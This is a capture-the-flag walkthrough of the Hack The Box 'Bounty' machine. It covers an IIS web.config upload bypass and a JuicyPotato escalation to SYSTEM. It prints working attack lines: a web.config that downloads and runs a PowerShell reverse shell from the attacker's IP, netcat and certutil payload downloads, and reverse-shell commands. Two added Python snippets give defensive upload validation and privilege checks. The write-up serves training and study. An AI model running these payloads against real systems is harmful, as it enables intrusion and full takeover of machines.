Hack The Box – Bounty Walkthrough

Hack The Box bounty machine title picture

Overview

This overview shows the direct path to the solution of the Hack The Box – Bounty box without giving the commands or tools used in the solution. There is an IIS webserver running on the machine which has an insecure file upload vulnerability. The user flag is there, it is just hidden. For the privilege escalation, a specific user privilege is exploited, one of the most famous ones.

This machine is listed in TJ Null’s OSCP preparation list.

Detailed Walkthrough

My IP: 10.10.16.9

Machine IP: 10.10.10.93

Machine Link: https://app.hackthebox.com/machines/142

Initial Foothold

Start with a default nmap scan.

┌──(root㉿kali)-[~/PREP/HTB/bounty]
└─# nmap -sC -sV -p- -Pn 10.10.10.93 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 13:52 EST
Nmap scan report for 10.10.10.93
Host is up (0.083s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

A single port is open. IIS is running on port 80. Version 7.5 indicates it is either Windows 7 or Windows Server 2008. Check the versions from here.

Landing page of the webserver. There is nothing to interact with, and nothing suspicious in the source code either.

We have nothing else to go on, so it is a good time for directory discovery. My favorite tool for webserver brute-forcing is FFUF.

┌──(root㉿kali)-[~/PREP/HTB/bounty]
└─# ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt:FUZZ -u http://bounty.htb/FUZZ -e ".asp,.aspx,.php,.config"
[REDACTED]
transfer.aspx           [Status: 200, Size: 941, Words: 89, Lines: 22, Duration: 182ms]
uploadedfiles           [Status: 301, Size: 155, Words: 9, Lines: 2, Duration: 181ms]
[REDACTED]

We found what we need to solve this box. However, since this is an IIS webserver, you may want to use an IIS common directories wordlist. The findings were unimportant, though. You can discover these directories by running consecutively or recursively with the wordlist.

┌──(root㉿kali)-[~/PREP/HTB/bounty]
└─# ffuf -w ~/PREP/HTB/bounty/iss-webserver-common-directories.txt:FUZZ -u http://bounty.htb/aspnet_client/system_web/FUZZ 
[REDACTED]
2_0_50727               [Status: 301, Size: 176, Words: 9, Lines: 2, Duration: 121ms]
2_0_50727/              [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 121ms]
:: Progress: [1305/1305] :: Job [1/1] :: 369 req/sec :: Duration: [0:00:04] :: Errors: 1 ::
[REDACTED]

This webserver only accepts image files. It checks only file extensions, and there is no way to upload anything other than .png and .jpg files. After some research, I found there is a web.config upload vulnerability in IIS web servers. We upload a file named `web.config` containing a reverse shell. For the reverse shell I used Nishang’s Invoke-PowerShellTcp.ps1. I fire up a simple HTTP server with Python to serve the reverse shell and upload the config file below.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<%
Set obj = CreateObject("WScript.Shell")
obj.Exec("cmd /c powershell IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.9/Invoke-PowerShellTcp.ps1')")
%>
-->

I added the line below at the end of the Invoke-PowerShellTcp.ps1 file for immediate execution.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.9 -Port 4444

Also take a look at these resources for reverse shells inside web.config files.
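The root cause above is an upload filter that looks only at the file name, so a reserved name like web.config gets through. The following is an added Python example, not code from the box or from the author: it models the extension-only deny-list the writeup describes (an assumption about the box, consistent with .asp/.aspx/.php being refused while web.config was accepted) next to a hardened validator that allow-lists image extensions, refuses names IIS interprets, and checks the file's magic bytes.

```python
import os
from pathlib import PureWindowsPath

# Constructed example, not the box's or the writeup author's code.
DENIED_EXT = {".asp", ".aspx", ".php", ".exe"}          # assumed deny-list on the box
ALLOWED_EXT = {".png", ".jpg", ".jpeg"}                  # allow-list for the hardened check
RESERVED_NAMES = {"web.config", "global.asax"}           # names IIS/ASP.NET interprets
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff"}


def vulnerable_check(filename: str) -> bool:
    """Extension-only deny-list: blocks shell.aspx but lets web.config through."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENIED_EXT


def hardened_check(filename: str, content: bytes) -> bool:
    """Allow-list the extension, refuse names IIS interprets, and verify the bytes
    really are an image. Uploads should additionally be stored under a server-
    generated name in a directory where IIS executes no handlers."""
    # Reject any directory component, drive letter or alternate data stream syntax.
    if PureWindowsPath(filename).name != filename or ":" in filename:
        return False
    # Windows strips trailing dots and spaces, so "web.config." is still web.config.
    name = filename.rstrip(". ").lower()
    if not name or name.startswith(".") or name in RESERVED_NAMES:
        return False
    ext = os.path.splitext(name)[1]
    if ext not in ALLOWED_EXT:
        return False
    # Magic bytes stop text payloads such as the web.config above regardless of name.
    return content.startswith(MAGIC[ext])


if __name__ == "__main__":
    xml = b"<?xml version=\"1.0\"?>"
    print("vulnerable accepts web.config:", vulnerable_check("web.config"))
    print("hardened accepts web.config:", hardened_check("web.config", xml))
    print("hardened accepts real png:", hardened_check("logo.png", MAGIC[".png"] + b"\x00"))
```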

Please note that user.txt is a hidden file and it cannot be seen with the regular dir command.

C:\Users\merlin\Desktop>dir /ah
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users\merlin\Desktop

05/29/2018  11:22 PM               282 desktop.ini
02/15/2024  08:45 PM                34 user.txt
               2 File(s)            316 bytes
               0 Dir(s)  11,575,607,296 bytes free


C:\Users\merlin\Desktop>type user.txt
type user.txt
077e556b4a931353****************

Privilege Escalation

After the initial foothold, basic enumeration shows that we can use potato attacks, because SeImpersonatePrivilege is enabled for this user. This can also be discovered by automated tools.

PS C:\Users\merlin> whoami /all

USER INFORMATION
----------------

User Name     SID                                           
============= ==============================================
bounty\merlin S-1-5-21-2239012103-4222820348-3209614936-1000

[REDACTED]

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Users\merlin> cd ..
PS C:\Users> dir

[REDACTED]
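The privilege table above is the whole precondition for the next step, so a defender auditing service and web-application identities wants to find it quickly. This is an added Python example, not part of the original writeup: it parses the PRIVILEGES INFORMATION table printed by `whoami /priv` or `whoami /all` and reports the token-abuse privileges that should be removed from such identities. The sample output is a constructed copy of the box's table.

```python
# Constructed example, not the box's or the writeup author's code.
# Privileges the Potato family of techniques depends on; Bounty's merlin holds both.
TOKEN_ABUSE_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample, shaped like the `whoami /all` output shown above.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
"""


def parse_privileges(text: str) -> dict:
    """Return {privilege name: state} from the PRIVILEGES INFORMATION table."""
    lines = text.splitlines()
    privs = {}
    start = next((i for i, l in enumerate(lines) if l.startswith("Privilege Name")), None)
    if start is None:
        return privs
    for row in lines[start + 2:]:          # skip the header line and the '=====' ruler
        parts = row.split()
        if not parts:                      # a blank line ends the table
            break
        privs[parts[0]] = parts[-1]        # name is the first column, State the last
    return privs


def token_abuse_privileges(privs: dict) -> list:
    """Privileges to flag whether Enabled or Disabled: 'Disabled' only means the
    process has not turned it on yet; the token still holds it and can enable it."""
    return sorted(p for p in privs if p in TOKEN_ABUSE_PRIVS)


if __name__ == "__main__":
    found = parse_privileges(SAMPLE)
    for name in token_abuse_privileges(found):
        print(f"{name}: {found[name]} (remove from service/app-pool identities)")
```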

I switched to cmd at this point, since I feel more comfortable with it. However, this exact operation can be done with PowerShell too.

PS C:\temp> (New-Object System.Net.WebClient).DownloadFile('http://10.10.16.9/nc.exe', 'C:\temp\nc.exe')
PS C:\temp> .\nc.exe 10.10.16.9 9000 -e cmd.exe

Then upload JuicyPotato, run the attack and get an NT AUTHORITY\SYSTEM shell. Check here for detailed information about Potato attacks, and the CLSID list here.

C:\temp>certutil -urlcache -f http://10.10.16.9/juicy.exe juicy.exe
certutil -urlcache -f http://10.10.16.9/juicy.exe juicy.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\temp>juicy.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.16.9 9001" -t *
juicy.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.16.9 9001" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Catch the Administrator shell on the listener.

┌──(root㉿kali)-[~/PREP/HTB/bounty]
└─# nc -nvlp 9001                                    
listening on [any] 9001 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.93] 49170
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

C:\Users\Administrator\Desktop>type root.txt
type root.txt
f801144e9492d081****************

Conclusion & Comments

This was a fun box. I was not aware of the web.config file upload vulnerability of IIS webservers. It took almost one day for me to find this vulnerability. I tried to upload a malicious image file which contains a php reverse shell, meterpreter shells with .asp and .aspx files, and various combinations of those with .jpg and .png files. I also modified the magic bytes and file extensions. None of them worked properly. Also, I know there are hidden files in Windows too, but I realized that I had not used a command like dir /ah on a Windows machine for hidden files. For the privilege escalation part, it was quite easy. If a box is a couple of years old and Windows, just throw potato attacks at it; it should work most of the time.

You never know when you will need Nishang.

Other Notable Resources